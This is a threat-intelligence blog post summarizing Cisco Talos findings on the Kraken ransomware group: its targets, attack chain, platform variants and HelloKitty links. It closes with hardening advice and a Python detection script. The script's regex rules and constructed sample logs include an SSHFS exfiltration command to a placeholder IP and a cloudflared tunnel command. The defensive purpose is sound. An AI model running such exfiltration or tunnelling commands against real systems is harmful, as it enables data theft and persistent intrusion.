Kraken Ransomware Strikes: A New Global Cyber Threat
In August 2025, security researchers at Cisco Talos identified a new and aggressive ransomware actor known as the Kraken ransomware group, which appears to have arisen from the remains of the HelloKitty ransomware cartel (Cisco Talos Blog). According to initial reports, Kraken uses large-scale “big-game hunting” techniques and double-extortion tactics, striking organisations across diverse sectors and international borders (Cisco Talos Blog).
Additional commentary and technical breakdowns are also available via a recent post on InfiniteSec’s blog.
Who is Kraken?
Kraken emerged in early 2025 and is a multi-platform ransomware actor that doesn’t limit itself to a single industry or geography. Victims span the United States, United Kingdom, Canada, Denmark, Panama, and Kuwait (Cisco Talos Blog).
The group utilises a data-leak site for double-extortion: if victims refuse to pay, their stolen data is published publicly (Cisco Talos Blog).
Technical Profile & Attack Chain
In one observed intrusion, the attackers exploited an exposed SMB vulnerability to gain access. They then used tools such as Cloudflared for persistence and SSHFS for data exfiltration prior to encryption (Cisco Talos Blog).
Kraken supports Windows, Linux, and VMware ESXi environments — a wide scope for a single actor (Cisco Talos Blog).
Notably, the ransomware engine benchmarks the victim system’s performance to determine the optimal encryption strategy—an advanced step rarely seen in typical ransomware operations (Cisco Talos Blog).
Windows, Linux & ESXi Variants
The Windows build of Kraken (32-bit C++) includes anti-analysis features, disables WoW64 file-system redirection, escalates privileges for file encryption, and excludes system folders to keep the machine alive long enough for negotiations (Cisco Talos Blog).
Its Linux/ESXi variant (64-bit C++) likewise adapts to the platform, terminates virtual machines, and self-cleans via an embedded “bye_bye.sh” script to erase traces (Cisco Talos Blog).
Link to HelloKitty & Underground Forum
Analysts believe Kraken is connected to HelloKitty or has inherited its operators—evidence includes reuse of the ransom-note filename, references to HelloKitty on the data-leak site, and the launch of a new underground forum dubbed “The Last Haven Board” (Cisco Talos Blog).
What You Should Be Doing
- Monitor for indicators of compromise (IOCs) tied to Kraken (Cisco Talos Blog).
- Harden SMB exposure, apply patches, and enforce multi-factor authentication.
- Segment networks, restrict access to VMs, and monitor for lateral movement (particularly hidden tunnels via Cloudflared and SSHFS mounts).
- Consider that an encryption event may be preceded by data exfiltration—plan for detection and response accordingly.
- Refer to both Talos’s detailed technical write-up and further analysis on InfiniteSec for extended context and practical IOCs.
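As an added illustration of the monitoring items above (this is not code from Talos or InfiniteSec), the following Python scans constructed process-creation records for the tooling named in this post: Cloudflared tunnels, SSHFS mounts, and the bye_bye.sh cleanup script, and raises severity when a tunnel and an SSHFS mount appear on the same host close together. The log format, the regex patterns, the correlation window and the sample records are all assumptions.

```python
import re
from collections import defaultdict

# Detection rules keyed on the tooling Talos reported in the Kraken intrusion.
# The patterns are assumptions about how these commands typically appear in
# process-creation telemetry, not signatures taken from the Talos report.
RULES = {
    "cloudflared_tunnel": re.compile(r"\bcloudflared(\.exe)?\b.*\btunnel\b", re.I),
    "sshfs_mount":        re.compile(r"\bsshfs\b\s+\S+@\S+:", re.I),
    "bye_bye_cleanup":    re.compile(r"\bbye_bye\.sh\b", re.I),
}

def parse_event(line):
    """Parse a 'ts|host|user|cmdline' process-creation record (constructed format)."""
    ts, host, user, cmdline = line.split("|", 3)
    return {"ts": int(ts), "host": host, "user": user, "cmdline": cmdline}

def scan_events(lines, window=3600):
    """Return rule hits; escalate to 'high' when a Cloudflared tunnel and an
    SSHFS mount land on the same host within `window` seconds, since that
    pairing matches the persistence-then-exfiltration pattern described above."""
    hits = []
    per_host = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        for name, rx in RULES.items():
            if rx.search(ev["cmdline"]):
                hits.append({**ev, "rule": name, "severity": "medium"})
                per_host[ev["host"]].append((ev["ts"], name))
    for host, seen in per_host.items():
        tunnels = [t for t, n in seen if n == "cloudflared_tunnel"]
        mounts = [t for t, n in seen if n == "sshfs_mount"]
        if any(abs(t - m) <= window for t in tunnels for m in mounts):
            for h in hits:
                if h["host"] == host and h["rule"] in ("cloudflared_tunnel", "sshfs_mount"):
                    h["severity"] = "high"
    return hits

# Constructed sample telemetry (not real data from the Talos report).
SAMPLE_LOG = [
    "1000|fs01|svc_backup|C:\\Temp\\cloudflared.exe tunnel run --token REDACTED",
    "1200|fs01|svc_backup|sshfs user@203.0.113.10:/stage /mnt/exfil -o reconnect",
    "1300|web02|www|python3 /opt/app/manage.py migrate",
    "9000|esx01|root|/bin/sh /tmp/bye_bye.sh",
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_LOG):
        print(hit["severity"], hit["host"], hit["rule"], hit["cmdline"])
```

In practice the records would come from EDR or auditd process-creation telemetry, and the host-level correlation is what separates a stray admin tool from the staged pattern Talos describes.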
Sources:
- Talos Intelligence Blog: “Unleashing the Kraken ransomware group” (Cisco Talos Blog)